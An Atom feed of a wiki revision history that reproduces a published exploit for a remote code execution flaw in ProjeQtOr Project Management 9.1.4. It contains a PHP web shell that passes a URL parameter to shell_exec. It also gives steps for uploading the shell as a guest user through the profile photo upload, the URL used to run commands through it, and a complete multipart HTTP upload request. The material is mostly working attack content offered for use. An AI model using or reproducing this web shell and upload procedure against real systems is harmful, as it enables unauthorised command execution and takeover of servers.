<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ProjeQtOr_Project_Management_9.1.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>ProjeQtOr Project Management 9.1.4 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ProjeQtOr_Project_Management_9.1.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ProjeQtOr_Project_Management_9.1.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T14:34:25Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=ProjeQtOr_Project_Management_9.1.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=3883&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution # Date: 29.05.2021 # Exploit Author: Temel Demir # Vendor Homepage: https://www.proje...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ProjeQtOr_Project_Management_9.1.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=3883&amp;oldid=prev"/>
		<updated>2021-06-02T01:09:37Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution # Date: 29.05.2021 # Exploit Author: Temel Demir # Vendor Homepage: https://www.proje...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution&lt;br /&gt;
# Date: 29.05.2021&lt;br /&gt;
# Exploit Author: Temel Demir&lt;br /&gt;
# Vendor Homepage: https://www.projeqtor.org&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip&lt;br /&gt;
# Version: v9.1.4&lt;br /&gt;
# Tested on: Laragon @WIN10&lt;br /&gt;
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. &lt;br /&gt;
&lt;br /&gt;
PoC Process Step_by_Step:&lt;br /&gt;
&lt;br /&gt;
# 1) Create a file with the below php code and save it as demir.pHp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php echo shell_exec($_GET['key'].' 2&amp;gt;&amp;amp;1'); ?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# 2) Login to ProjeQtOr portal as guest user&lt;br /&gt;
# 3) Click -profile- button on header panel.&lt;br /&gt;
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.&lt;br /&gt;
# 5) Click OK. Script will give you &amp;quot;Attachment #($number) inserted&amp;quot;. Attachment number need us for file path. (demo: attachment number is &amp;quot;23&amp;quot; &amp;gt; file directory &amp;quot;/files/attach//attachment_23/&amp;quot; )&lt;br /&gt;
# 6) As a last step you have to add the &amp;quot;.projeqtor&amp;quot; statement to the file extension.&lt;br /&gt;
You can call the uploaded file like this &amp;gt; http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor&lt;br /&gt;
&lt;br /&gt;
# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Example Request:&lt;br /&gt;
&lt;br /&gt;
POST /project/tool/saveAttachment.php HTTP/1.1&lt;br /&gt;
Host: ip:port&lt;br /&gt;
Content-Length: 1196&lt;br /&gt;
Accept: application/json&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36&lt;br /&gt;
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Origin: http://ip:port/website_location/&lt;br /&gt;
Sec-Fetch-Site: same-origin&lt;br /&gt;
Sec-Fetch-Mode: cors&lt;br /&gt;
Sec-Fetch-Dest: empty&lt;br /&gt;
Referer: http://ip:port/website_location/view/main.php&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentFiles[]&amp;quot;; filename=&amp;quot;demir.pHp&amp;quot;&lt;br /&gt;
Content-Type: application/octet-stream&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php echo shell_exec($_GET['key'].' 2&amp;gt;&amp;amp;1'); ?&amp;gt;&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentId&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentRefType&amp;quot;&lt;br /&gt;
&lt;br /&gt;
User&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentRefId&amp;quot;&lt;br /&gt;
&lt;br /&gt;
($your_profile_id //edit)&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentType&amp;quot;&lt;br /&gt;
&lt;br /&gt;
file&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;MAX_FILE_SIZE&amp;quot;&lt;br /&gt;
&lt;br /&gt;
10485760&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentLink&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentDescription&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;attachmentPrivacy&amp;quot;&lt;br /&gt;
&lt;br /&gt;
1&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;uploadType&amp;quot;&lt;br /&gt;
&lt;br /&gt;
html5&lt;br /&gt;
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>